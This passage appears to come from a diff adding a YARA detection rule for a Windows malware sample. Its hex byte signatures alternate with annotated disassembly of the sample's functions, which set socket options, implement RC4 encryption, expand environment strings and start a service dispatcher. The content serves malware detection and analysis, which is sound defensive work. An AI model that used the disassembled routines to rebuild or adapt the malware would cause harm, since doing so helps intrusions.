?? 50 64 89 25 ?? ?? ?? ?? 81 EC 9C 01 00 00 56 8B F1 89 74 24 ?? 8D 4E ?? E8 ?? ?? ?? ?? 8D 4E ?? C7 84 24 ?? ?? ?? ?? 00 00 00 00 E8 ?? ?? ?? ?? 8D 4E ?? C6 84 24 ?? ?? ?? ?? 01 E8 ?? ?? ?? ?? 8D 4E ?? C6 84 24 ?? ?? ?? ?? 02 E8 ?? ?? ?? ?? 8D 44 24 ?? C6 84 24 ?? ?? ?? ?? 03 50 68 02 02 00 00 C7 06 68 92 40 00 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 01 6A 00 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 89 86 ?? ?? ?? ?? 6A 05 C6 86 ?? ?? ?? ?? 00 C7 86 ?? ?? ?? ?? FF FF FF FF B0 75 51 8B 0D ?? ?? ?? ?? 68 94 A5 40 00 C6 44 24 ?? 4B 88 44 24 ?? C6 44 24 ?? 47 C6 44 24 ?? 6F 88 44 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 34 AC 40 00 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 50 68 34 AC 40 00 68 A0 A7 40 00 E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B C6 5E 64 89 0D ?? ?? ?? ?? 81 C4 A8 01 00 00 C3 } + /* +function at 0x004021b0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - set socket configuration + .text:0x004021b0 + .text:0x004021b0 FUNC: int thiscall_caller sub_004021b0( void * ecx, ) [12 XREFS] + .text:0x004021b0 + .text:0x004021b0 Stack Variables: (offset from initial top of stack) + .text:0x004021b0 -2: int local2 + .text:0x004021b0 -4: int local4 + .text:0x004021b0 + .text:0x004021b0 51 push ecx + .text:0x004021b1 56 push esi + .text:0x004021b2 57 push edi + .text:0x004021b3 8b3d78904000 mov edi,dword [0x00409078] + .text:0x004021b9 8bf1 mov esi,ecx + .text:0x004021bb 6a00 push 0 + .text:0x004021bd ffd7 call edi ;kernel32.Sleep(0) + .text:0x004021bf 6a00 push 0 + .text:0x004021c1 66c744240c0100 mov word [esp + 12],1 + .text:0x004021c8 66c744240e0000 mov word [esp + 14],0 + .text:0x004021cf ffd7 call edi ;kernel32.Sleep(0) + .text:0x004021d1 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x004021d7 8d442408 lea eax,dword [esp + 8] + .text:0x004021db 6a04 push 4 + .text:0x004021dd 50 push eax + .text:0x004021de 6880000000 push 128 + .text:0x004021e3 68ffff0000 push 0x0000ffff + .text:0x004021e8 51 push ecx + .text:0x004021e9 ff152c924000 call dword [0x0040922c] 
;ws2_32.setsockopt(0x61616161,0x0000ffff,128,local4) + .text:0x004021ef 6a00 push 0 + .text:0x004021f1 ffd7 call edi ;kernel32.Sleep(0) + .text:0x004021f3 8b96a8000000 mov edx,dword [esi + 168] + .text:0x004021f9 52 push edx + .text:0x004021fa ff15a0904000 call dword [0x004090a0] ;kernel32.CancelIo(0x61616161) + .text:0x00402200 6a00 push 0 + .text:0x00402202 ffd7 call edi ;kernel32.Sleep(0) + .text:0x00402204 8d86b0000000 lea eax,dword [esi + 176] + .text:0x0040220a 6a00 push 0 + .text:0x0040220c 50 push eax + .text:0x0040220d ff159c904000 call dword [0x0040909c] ;kernel32.InterlockedExchange(ecx,0) + .text:0x00402213 6a00 push 0 + .text:0x00402215 ffd7 call edi ;kernel32.Sleep(0) + .text:0x00402217 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x0040221d 51 push ecx + .text:0x0040221e ff1504924000 call dword [0x00409204] ;ws2_32.closesocket(0x61616161) + .text:0x00402224 6a00 push 0 + .text:0x00402226 ffd7 call edi ;kernel32.Sleep(0) + .text:0x00402228 8b96ac000000 mov edx,dword [esi + 172] + .text:0x0040222e 52 push edx + .text:0x0040222f ff1598904000 call dword [0x00409098] ;kernel32.SetEvent(0x61616161) + .text:0x00402235 6a00 push 0 + .text:0x00402237 ffd7 call edi ;kernel32.Sleep(0) + .text:0x00402239 c786a8000000ffff mov dword [esi + 168],0xffffffff + .text:0x00402243 5f pop edi + .text:0x00402244 5e pop esi + .text:0x00402245 59 pop ecx + .text:0x00402246 c3 ret + */ + $c27 = { 51 56 57 8B 3D ?? ?? ?? ?? 8B F1 6A 00 FF D7 6A 00 66 C7 44 24 ?? 01 00 66 C7 44 24 ?? 00 00 FF D7 8B 8E ?? ?? ?? ?? 8D 44 24 ?? 6A 04 50 68 80 00 00 00 68 FF FF 00 00 51 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 96 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8D 86 ?? ?? ?? ?? 6A 00 50 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 8E ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 96 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D7 C7 86 ?? ?? ?? ?? 
FF FF FF FF 5F 5E 59 C3 } + /* +function at 0x00404950@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - encrypt data using RC4 KSA + .text:0x00404950 + .text:0x00404950 FUNC: int stdcall sub_00404950( int arg0, int arg1, int arg2, ) [4 XREFS] + .text:0x00404950 + .text:0x00404950 Stack Variables: (offset from initial top of stack) + .text:0x00404950 12: int arg2 + .text:0x00404950 8: int arg1 + .text:0x00404950 4: int arg0 + .text:0x00404950 -1020: int local1020 + .text:0x00404950 -1024: int local1024 + .text:0x00404950 + .text:0x00404950 81ec00040000 sub esp,1024 + .text:0x00404956 53 push ebx + .text:0x00404957 55 push ebp + .text:0x00404958 56 push esi + .text:0x00404959 57 push edi + .text:0x0040495a 33db xor ebx,ebx + .text:0x0040495c 33f6 xor esi,esi + .text:0x0040495e b9ff000000 mov ecx,255 + .text:0x00404963 33c0 xor eax,eax + .text:0x00404965 8d7c2414 lea edi,dword [esp + 20] + .text:0x00404969 895c2410 mov dword [esp + 16],ebx + .text:0x0040496d f3ab rep: stosd + .text:0x0040496f 8b8c2414040000 mov ecx,dword [esp + 1044] + .text:0x00404976 8d7c2410 lea edi,dword [esp + 16] + .text:0x0040497a loc_0040497a: [1 XREFS] + .text:0x0040497a 8bc3 mov eax,ebx + .text:0x0040497c 33d2 xor edx,edx + .text:0x0040497e f7b4241c040000 div dword [esp + 1052] + .text:0x00404985 8bac2418040000 mov ebp,dword [esp + 1048] + .text:0x0040498c 33c0 xor eax,eax + .text:0x0040498e 881c0b mov byte [ebx + ecx],bl + .text:0x00404991 43 inc ebx + .text:0x00404992 83c704 add edi,4 + .text:0x00404995 81fb00010000 cmp ebx,256 + .text:0x0040499b 8a042a mov al,byte [edx + ebp] + .text:0x0040499e 8947fc mov dword [edi - 4],eax + .text:0x004049a1 7cd7 jl 0x0040497a + .text:0x004049a3 33c0 xor eax,eax + .text:0x004049a5 8d7c2410 lea edi,dword [esp + 16] + .text:0x004049a9 loc_004049a9: [1 XREFS] + .text:0x004049a9 8a1408 mov dl,byte [eax + ecx] + .text:0x004049ac 8b2f mov ebp,dword [edi] + .text:0x004049ae 8bda mov ebx,edx + .text:0x004049b0 81e3ff000000 and ebx,255 + .text:0x004049b6 
03dd add ebx,ebp + .text:0x004049b8 03f3 add esi,ebx + .text:0x004049ba 81e6ff000080 and esi,0x800000ff + .text:0x004049c0 7908 jns 0x004049ca + .text:0x004049c2 4e dec esi + .text:0x004049c3 81ce00ffffff or esi,0xffffff00 + .text:0x004049c9 46 inc esi + .text:0x004049ca loc_004049ca: [1 XREFS] + .text:0x004049ca 8a1c0e mov bl,byte [esi + ecx] + .text:0x004049cd 83c704 add edi,4 + .text:0x004049d0 881c08 mov byte [eax + ecx],bl + .text:0x004049d3 40 inc eax + .text:0x004049d4 3d00010000 cmp eax,256 + .text:0x004049d9 88140e mov byte [esi + ecx],dl + .text:0x004049dc 7ccb jl 0x004049a9 + .text:0x004049de 5f pop edi + .text:0x004049df 5e pop esi + .text:0x004049e0 5d pop ebp + .text:0x004049e1 5b pop ebx + .text:0x004049e2 81c400040000 add esp,1024 + .text:0x004049e8 c20c00 ret 12 + */ + $c28 = { 81 EC 00 04 00 00 53 55 56 57 33 DB 33 F6 B9 FF 00 00 00 33 C0 8D 7C 24 ?? 89 5C 24 ?? F3 AB 8B 8C 24 ?? ?? ?? ?? 8D 7C 24 ?? 8B C3 33 D2 F7 B4 24 ?? ?? ?? ?? 8B AC 24 ?? ?? ?? ?? 33 C0 88 1C 0B 43 83 C7 04 81 FB 00 01 00 00 8A 04 2A 89 47 ?? 7C ?? 33 C0 8D 7C 24 ?? 8A 14 08 8B 2F 8B DA 81 E3 FF 00 00 00 03 DD 03 F3 81 E6 FF 00 00 80 79 ?? 4E 81 CE 00 FF FF FF 46 8A 1C 0E 83 C7 04 88 1C 08 40 3D 00 01 00 00 88 14 0E 7C ?? 
5F 5E 5D 5B 81 C4 00 04 00 00 C2 0C 00 } + /* +function at 0x004049f0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - encrypt data using RC4 PRGA + .text:0x004049f0 + .text:0x004049f0 FUNC: int stdcall sub_004049f0( int arg0, int arg1, int arg2, ) [8 XREFS] + .text:0x004049f0 + .text:0x004049f0 Stack Variables: (offset from initial top of stack) + .text:0x004049f0 12: int arg2 + .text:0x004049f0 8: int arg1 + .text:0x004049f0 4: int arg0 + .text:0x004049f0 + .text:0x004049f0 8b44240c mov eax,dword [esp + 12] + .text:0x004049f4 56 push esi + .text:0x004049f5 57 push edi + .text:0x004049f6 33c9 xor ecx,ecx + .text:0x004049f8 33f6 xor esi,esi + .text:0x004049fa 33ff xor edi,edi + .text:0x004049fc 85c0 test eax,eax + .text:0x004049fe 767c jbe 0x00404a7c + .text:0x00404a00 8b44240c mov eax,dword [esp + 12] + .text:0x00404a04 53 push ebx + .text:0x00404a05 55 push ebp + .text:0x00404a06 8b6c2418 mov ebp,dword [esp + 24] + .text:0x00404a0a loc_00404a0a: [1 XREFS] + .text:0x00404a0a 41 inc ecx + .text:0x00404a0b 81e1ff000080 and ecx,0x800000ff + .text:0x00404a11 7908 jns 0x00404a1b + .text:0x00404a13 49 dec ecx + .text:0x00404a14 81c900ffffff or ecx,0xffffff00 + .text:0x00404a1a 41 inc ecx + .text:0x00404a1b loc_00404a1b: [1 XREFS] + .text:0x00404a1b 8a1401 mov dl,byte [ecx + eax] + .text:0x00404a1e 8bda mov ebx,edx + .text:0x00404a20 81e3ff000000 and ebx,255 + .text:0x00404a26 03f3 add esi,ebx + .text:0x00404a28 81e6ff000080 and esi,0x800000ff + .text:0x00404a2e 7908 jns 0x00404a38 + .text:0x00404a30 4e dec esi + .text:0x00404a31 81ce00ffffff or esi,0xffffff00 + .text:0x00404a37 46 inc esi + .text:0x00404a38 loc_00404a38: [1 XREFS] + .text:0x00404a38 8a1c06 mov bl,byte [esi + eax] + .text:0x00404a3b 88542418 mov byte [esp + 24],dl + .text:0x00404a3f 881c01 mov byte [ecx + eax],bl + .text:0x00404a42 8b5c2418 mov ebx,dword [esp + 24] + .text:0x00404a46 881406 mov byte [esi + eax],dl + .text:0x00404a49 33d2 xor edx,edx + .text:0x00404a4b 8a1401 mov dl,byte [ecx + eax] 
+ .text:0x00404a4e 81e3ff000000 and ebx,255 + .text:0x00404a54 03d3 add edx,ebx + .text:0x00404a56 81e2ff000080 and edx,0x800000ff + .text:0x00404a5c 7908 jns 0x00404a66 + .text:0x00404a5e 4a dec edx + .text:0x00404a5f 81ca00ffffff or edx,0xffffff00 + .text:0x00404a65 42 inc edx + .text:0x00404a66 loc_00404a66: [1 XREFS] + .text:0x00404a66 8a1402 mov dl,byte [edx + eax] + .text:0x00404a69 8a1c2f mov bl,byte [edi + ebp] + .text:0x00404a6c 32da xor bl,dl + .text:0x00404a6e 8b54241c mov edx,dword [esp + 28] + .text:0x00404a72 881c2f mov byte [edi + ebp],bl + .text:0x00404a75 47 inc edi + .text:0x00404a76 3bfa cmp edi,edx + .text:0x00404a78 7290 jc 0x00404a0a + .text:0x00404a7a 5d pop ebp + .text:0x00404a7b 5b pop ebx + .text:0x00404a7c loc_00404a7c: [1 XREFS] + .text:0x00404a7c 5f pop edi + .text:0x00404a7d 5e pop esi + .text:0x00404a7e c20c00 ret 12 + */ + $c29 = { 8B 44 24 ?? 56 57 33 C9 33 F6 33 FF 85 C0 76 ?? 8B 44 24 ?? 53 55 8B 6C 24 ?? 41 81 E1 FF 00 00 80 79 ?? 49 81 C9 00 FF FF FF 41 8A 14 01 8B DA 81 E3 FF 00 00 00 03 F3 81 E6 FF 00 00 80 79 ?? 4E 81 CE 00 FF FF FF 46 8A 1C 06 88 54 24 ?? 88 1C 01 8B 5C 24 ?? 88 14 06 33 D2 8A 14 01 81 E3 FF 00 00 00 03 D3 81 E2 FF 00 00 80 79 ?? 4A 81 CA 00 FF FF FF 42 8A 14 02 8A 1C 2F 32 DA 8B 54 24 ?? 88 1C 2F 47 3B FA 72 ?? 
5D 5B 5F 5E C2 0C 00 } + /* +function at 0x00406f60@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - query environment variable + .text:0x00406f60 + .text:0x00406f60 FUNC: int stdcall sub_00406f60( int arg0, int arg1, int arg2, int arg3, ) [2 XREFS] + .text:0x00406f60 + .text:0x00406f60 Stack Variables: (offset from initial top of stack) + .text:0x00406f60 16: int arg3 + .text:0x00406f60 12: int arg2 + .text:0x00406f60 8: int arg1 + .text:0x00406f60 4: int arg0 + .text:0x00406f60 -7: int local7 + .text:0x00406f60 -8: int local8 + .text:0x00406f60 -9: int local9 + .text:0x00406f60 -10: int local10 + .text:0x00406f60 -11: int local11 + .text:0x00406f60 -12: int local12 + .text:0x00406f60 -14: int local14 + .text:0x00406f60 -15: int local15 + .text:0x00406f60 -16: int local16 + .text:0x00406f60 -20: int local20 + .text:0x00406f60 -21: int local21 + .text:0x00406f60 -22: int local22 + .text:0x00406f60 -23: int local23 + .text:0x00406f60 -24: int local24 + .text:0x00406f60 -25: int local25 + .text:0x00406f60 -26: int local26 + .text:0x00406f60 -27: int local27 + .text:0x00406f60 -28: int local28 + .text:0x00406f60 -29: int local29 + .text:0x00406f60 -30: int local30 + .text:0x00406f60 -31: int local31 + .text:0x00406f60 -32: int local32 + .text:0x00406f60 -36: int local36 + .text:0x00406f60 -37: int local37 + .text:0x00406f60 -38: int local38 + .text:0x00406f60 -39: int local39 + .text:0x00406f60 -40: int local40 + .text:0x00406f60 -43: int local43 + .text:0x00406f60 -44: int local44 + .text:0x00406f60 -45: int local45 + .text:0x00406f60 -46: int local46 + .text:0x00406f60 -47: int local47 + .text:0x00406f60 -48: int local48 + .text:0x00406f60 -76: int local76 + .text:0x00406f60 -335: int local335 + .text:0x00406f60 -336: int local336 + .text:0x00406f60 -595: int local595 + .text:0x00406f60 -596: int local596 + .text:0x00406f60 -855: int local855 + .text:0x00406f60 -856: int local856 + .text:0x00406f60 -1879: int local1879 + .text:0x00406f60 -1880: int local1880 + 
.text:0x00406f60 + .text:0x00406f60 55 push ebp + .text:0x00406f61 8bec mov ebp,esp + .text:0x00406f63 81ec54070000 sub esp,1876 + .text:0x00406f69 53 push ebx + .text:0x00406f6a 56 push esi + .text:0x00406f6b 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406f71 33db xor ebx,ebx + .text:0x00406f73 57 push edi + .text:0x00406f74 53 push ebx + .text:0x00406f75 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406f77 53 push ebx + .text:0x00406f78 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406f7a 90 nop + .text:0x00406f7b 90 nop + .text:0x00406f7c 90 nop + .text:0x00406f7d 90 nop + .text:0x00406f7e 90 nop + .text:0x00406f7f 90 nop + .text:0x00406f80 90 nop + .text:0x00406f81 90 nop + .text:0x00406f82 90 nop + .text:0x00406f83 53 push ebx + .text:0x00406f84 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406f86 90 nop + .text:0x00406f87 53 push ebx + .text:0x00406f88 53 push ebx + .text:0x00406f89 53 push ebx + .text:0x00406f8a ff1514914000 call dword [0x00409114] ;kernel32.GetCurrentThreadId() + .text:0x00406f90 50 push eax + .text:0x00406f91 ff15c8914000 call dword [0x004091c8] ;user32.PostThreadMessageA(kernel32.GetCurrentThreadId(),0,0,0) + .text:0x00406f97 53 push ebx + .text:0x00406f98 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406f9a 90 nop + .text:0x00406f9b ff15cc914000 call dword [0x004091cc] ;user32.GetInputState() + .text:0x00406fa1 53 push ebx + .text:0x00406fa2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406fa4 90 nop + .text:0x00406fa5 53 push ebx + .text:0x00406fa6 53 push ebx + .text:0x00406fa7 8d45b8 lea eax,dword [ebp - 72] + .text:0x00406faa 53 push ebx + .text:0x00406fab 50 push eax + .text:0x00406fac ff15d0914000 call dword [0x004091d0] ;user32.GetMessageA(local76,0,0,0) + .text:0x00406fb2 53 push ebx + .text:0x00406fb3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406fb5 90 nop + .text:0x00406fb6 b9ff000000 mov ecx,255 + .text:0x00406fbb 33c0 xor eax,eax + .text:0x00406fbd 8dbdadf8ffff lea edi,dword [ebp - 1875] + .text:0x00406fc3 889dacf8ffff 
mov byte [ebp - 1876],bl + .text:0x00406fc9 f3ab rep: stosd + .text:0x00406fcb 66ab stosd + .text:0x00406fcd 6854030000 push 852 + .text:0x00406fd2 6818a24000 push 0x0040a218 + .text:0x00406fd7 aa stosb + .text:0x00406fd8 e8b3fcffff call 0x00406c90 ;sub_00406c90(0x0040a218,852) + .text:0x00406fdd 689a010000 push 410 + .text:0x00406fe2 6878a04000 push 0x0040a078 + .text:0x00406fe7 e8a4fcffff call 0x00406c90 ;sub_00406c90(0x0040a078,410) + .text:0x00406fec 6a01 push 1 + .text:0x00406fee e8bdf8ffff call 0x004068b0 ;sub_004068b0(1) + .text:0x00406ff3 83c414 add esp,20 + .text:0x00406ff6 85c0 test eax,eax + .text:0x00406ff8 7420 jz 0x0040701a + .text:0x00406ffa 53 push ebx + .text:0x00406ffb ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406ffd 90 nop + .text:0x00406ffe 391d5ca54000 cmp dword [0x0040a55c],ebx + .text:0x00407004 7405 jz 0x0040700b + .text:0x00407006 e815e9ffff call 0x00405920 ;sub_00405920() + .text:0x0040700b loc_0040700b: [1 XREFS] + .text:0x0040700b 53 push ebx + .text:0x0040700c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040700e 90 nop + .text:0x0040700f 5f pop edi + .text:0x00407010 5e pop esi + .text:0x00407011 33c0 xor eax,eax + .text:0x00407013 5b pop ebx + .text:0x00407014 8be5 mov esp,ebp + .text:0x00407016 5d pop ebp + .text:0x00407017 c21000 ret 16 + .text:0x0040701a loc_0040701a: [1 XREFS] + .text:0x0040701a b940000000 mov ecx,64 + .text:0x0040701f 33c0 xor eax,eax + .text:0x00407021 8dbdb5feffff lea edi,dword [ebp - 331] + .text:0x00407027 c685b4feffff00 mov byte [ebp - 332],0 + .text:0x0040702e f3ab rep: stosd + .text:0x00407030 66ab stosd + .text:0x00407032 53 push ebx + .text:0x00407033 aa stosb + .text:0x00407034 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407036 8d8db4feffff lea ecx,dword [ebp - 332] + .text:0x0040703c 6804010000 push 260 + .text:0x00407041 51 push ecx + .text:0x00407042 68fca34000 push 0x0040a3fc + .text:0x00407047 ff1534914000 call dword [0x00409134] ;kernel32.ExpandEnvironmentStringsA(0x0040a3fc,local336,260) + 
.text:0x0040704d 53 push ebx + .text:0x0040704e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407050 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407056 8d95b4feffff lea edx,dword [ebp - 332] + .text:0x0040705c 52 push edx + .text:0x0040705d 68fca34000 push 0x0040a3fc + .text:0x00407062 e809d7ffff call 0x00404770 ;sub_00404770(0x0040a3fc,local336) + .text:0x00407067 53 push ebx + .text:0x00407068 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040706a 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407070 68fca34000 push 0x0040a3fc + .text:0x00407075 e876d6ffff call 0x004046f0 ;sub_004046f0(0x0040a3fc) + .text:0x0040707a 80b8fba340005c cmp byte [eax + 0x0040a3fb],92 + .text:0x00407081 7517 jnz 0x0040709a + .text:0x00407083 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407089 68fca34000 push 0x0040a3fc + .text:0x0040708e e85dd6ffff call 0x004046f0 ;sub_004046f0(0x0040a3fc) + .text:0x00407093 c680fba3400000 mov byte [eax + 0x0040a3fb],0 + .text:0x0040709a loc_0040709a: [1 XREFS] + .text:0x0040709a 53 push ebx + .text:0x0040709b c645f825 mov byte [ebp - 8],37 + .text:0x0040709f c645f973 mov byte [ebp - 7],115 + .text:0x004070a3 c645fa5c mov byte [ebp - 6],92 + .text:0x004070a7 c645fb25 mov byte [ebp - 5],37 + .text:0x004070ab c645fc73 mov byte [ebp - 4],115 + .text:0x004070af c645fd00 mov byte [ebp - 3],0 + .text:0x004070b3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004070b5 6860a44000 push 0x0040a460 + .text:0x004070ba 8d45f8 lea eax,dword [ebp - 8] + .text:0x004070bd 68fca34000 push 0x0040a3fc + .text:0x004070c2 50 push eax + .text:0x004070c3 68d8aa4000 push 0x0040aad8 + .text:0x004070c8 e8f30d0000 call 0x00407ec0 ;msvcrt.sprintf(0x0040aad8,local12) + .text:0x004070cd 83c410 add esp,16 + .text:0x004070d0 53 push ebx + .text:0x004070d1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004070d3 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004070d9 68e0a04000 push 0x0040a0e0 + .text:0x004070de 6834ac4000 push 0x0040ac34 + .text:0x004070e3 e888d6ffff call 
0x00404770 ;sub_00404770(0x0040ac34,0x0040a0e0) + .text:0x004070e8 53 push ebx + .text:0x004070e9 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004070eb 391d68a54000 cmp dword [0x0040a568],ebx + .text:0x004070f1 7405 jz 0x004070f8 + .text:0x004070f3 e8b8fcffff call 0x00406db0 ;sub_00406db0() + .text:0x004070f8 loc_004070f8: [1 XREFS] + .text:0x004070f8 a060a54000 mov al,byte [0x0040a560] + .text:0x004070fd 84c0 test al,al + .text:0x004070ff 0f840a020000 jz 0x0040730f + .text:0x00407105 b940000000 mov ecx,64 + .text:0x0040710a 33c0 xor eax,eax + .text:0x0040710c 8dbdadfcffff lea edi,dword [ebp - 851] + .text:0x00407112 c685acfcffff00 mov byte [ebp - 852],0 + .text:0x00407119 f3ab rep: stosd + .text:0x0040711b 66ab stosd + .text:0x0040711d 53 push ebx + .text:0x0040711e aa stosb + .text:0x0040711f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407121 8d8dacfcffff lea ecx,dword [ebp - 852] + .text:0x00407127 6804010000 push 260 + .text:0x0040712c 51 push ecx + .text:0x0040712d 53 push ebx + .text:0x0040712e ff1538914000 call dword [0x00409138] ;kernel32.GetModuleFileNameA(0,local856,260) + .text:0x00407134 53 push ebx + .text:0x00407135 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407137 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x0040713d 8d95acfcffff lea edx,dword [ebp - 852] + .text:0x00407143 68d8aa4000 push 0x0040aad8 + .text:0x00407148 52 push edx + .text:0x00407149 e8b2d6ffff call 0x00404800 ;sub_00404800(0,local856,0x0040aad8) + .text:0x0040714e 85c0 test eax,eax + .text:0x00407150 757e jnz 0x004071d0 + .text:0x00407152 a060a54000 mov al,byte [0x0040a560] + .text:0x00407157 66c70510ac400003 mov word [0x0040ac10],3 + .text:0x00407160 3c02 cmp al,2 + .text:0x00407162 755c jnz 0x004071c0 + .text:0x00407164 53 push ebx + .text:0x00407165 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407167 53 push ebx + .text:0x00407168 c745e418a24000 mov dword [ebp - 28],0x0040a218 + .text:0x0040716f c745e8a06d4000 mov dword [ebp - 24],0x00406da0 + .text:0x00407176 895dec mov 
dword [ebp - 20],ebx + .text:0x00407179 895df0 mov dword [ebp - 16],ebx + .text:0x0040717c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040717e 53 push ebx + .text:0x0040717f 66c70510ac400001 mov word [0x0040ac10],1 + .text:0x00407188 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040718a 90 nop + .text:0x0040718b 68f4010000 push 500 + .text:0x00407190 ffd6 call esi ;kernel32.Sleep(500) + .text:0x00407192 53 push ebx + .text:0x00407193 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407195 8b3d24904000 mov edi,dword [0x00409024] + .text:0x0040719b 8d45e4 lea eax,dword [ebp - 28] + .text:0x0040719e 50 push eax + .text:0x0040719f ffd7 call edi ;advapi32.StartServiceCtrlDispatcherA(local32) + .text:0x004071a1 53 push ebx + .text:0x004071a2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004071a4 68e8030000 push 1000 + .text:0x004071a9 ffd6 call esi ;kernel32.Sleep(1000) + .text:0x004071ab 53 push ebx + .text:0x004071ac ffd6 call esi ;kernel32.Sleep(0) + .text:0x004071ae 8d4de4 lea ecx,dword [ebp - 28] + .text:0x004071b1 51 push ecx + .text:0x004071b2 ffd7 call edi ;advapi32.StartServiceCtrlDispatcherA(local32) + .text:0x004071b4 53 push ebx + .text:0x004071b5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004071b7 66c70510ac400002 mov word [0x0040ac10],2 + .text:0x004071c0 loc_004071c0: [1 XREFS] + .text:0x004071c0 e8abfbffff call 0x00406d70 ;sub_00406d70(0,local856) + .text:0x004071c5 5f pop edi + .text:0x004071c6 5e pop esi + .text:0x004071c7 33c0 xor eax,eax + .text:0x004071c9 5b pop ebx + .text:0x004071ca 8be5 mov esp,ebp + .text:0x004071cc 5d pop ebp + .text:0x004071cd c21000 ret 16 + .text:0x004071d0 loc_004071d0: [1 XREFS] + .text:0x004071d0 6a00 push 0 + .text:0x004071d2 895df4 mov dword [ebp - 12],ebx + .text:0x004071d5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004071d7 b940000000 mov ecx,64 + .text:0x004071dc 33c0 xor eax,eax + .text:0x004071de 8dbdb1fdffff lea edi,dword [ebp - 591] + .text:0x004071e4 c685b0fdffff00 mov byte [ebp - 592],0 + .text:0x004071eb f3ab rep: stosd 
+ .text:0x004071ed 66ab stosd + .text:0x004071ef 6a00 push 0 + .text:0x004071f1 c645d425 mov byte [ebp - 44],37 + .text:0x004071f5 c645d573 mov byte [ebp - 43],115 + .text:0x004071f9 c645d65c mov byte [ebp - 42],92 + .text:0x004071fd c645d725 mov byte [ebp - 41],37 + .text:0x00407201 c645d873 mov byte [ebp - 40],115 + .text:0x00407205 c645d900 mov byte [ebp - 39],0 + .text:0x00407209 aa stosb + .text:0x0040720a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040720c 6860a44000 push 0x0040a460 + .text:0x00407211 8d55d4 lea edx,dword [ebp - 44] + .text:0x00407214 68fca34000 push 0x0040a3fc + .text:0x00407219 8d85b0fdffff lea eax,dword [ebp - 592] + .text:0x0040721f 52 push edx + .text:0x00407220 50 push eax + .text:0x00407221 e89a0c0000 call 0x00407ec0 ;msvcrt.sprintf(local596,local48) + .text:0x00407226 6892a44000 push 0x0040a492 + .text:0x0040722b 6818a24000 push 0x0040a218 + .text:0x00407230 e8ebc2ffff call 0x00403520 ;sub_00403520(msvcrt.sprintf(local596,local48),local48,64,0x0040a218,0x0040a492) + .text:0x00407235 6818a24000 push 0x0040a218 + .text:0x0040723a e811f4ffff call 0x00406650 ;sub_00406650(0x0040a218) + .text:0x0040723f 83c41c add esp,28 + .text:0x00407242 6a00 push 0 + .text:0x00407244 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407246 68fca24000 push 0x0040a2fc + .text:0x0040724b 687ca24000 push 0x0040a27c + .text:0x00407250 8d8db0fdffff lea ecx,dword [ebp - 592] + .text:0x00407256 6818a24000 push 0x0040a218 + .text:0x0040725b 51 push ecx + .text:0x0040725c e88f010000 call 0x004073f0 ;sub_004073f0(local596,0x0040a218,0x0040a27c,0x0040a2fc) + .text:0x00407261 8b3dac914000 mov edi,dword [0x004091ac] + .text:0x00407267 83c410 add esp,16 + .text:0x0040726a loc_0040726a: [2 XREFS] + .text:0x0040726a 6a00 push 0 + .text:0x0040726c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040726e 6860a44000 push 0x0040a460 + .text:0x00407273 e8f8060000 call 0x00407970 ;sub_00407970(0x0040a460) + .text:0x00407278 83c404 add esp,4 + .text:0x0040727b 85c0 test eax,eax + 
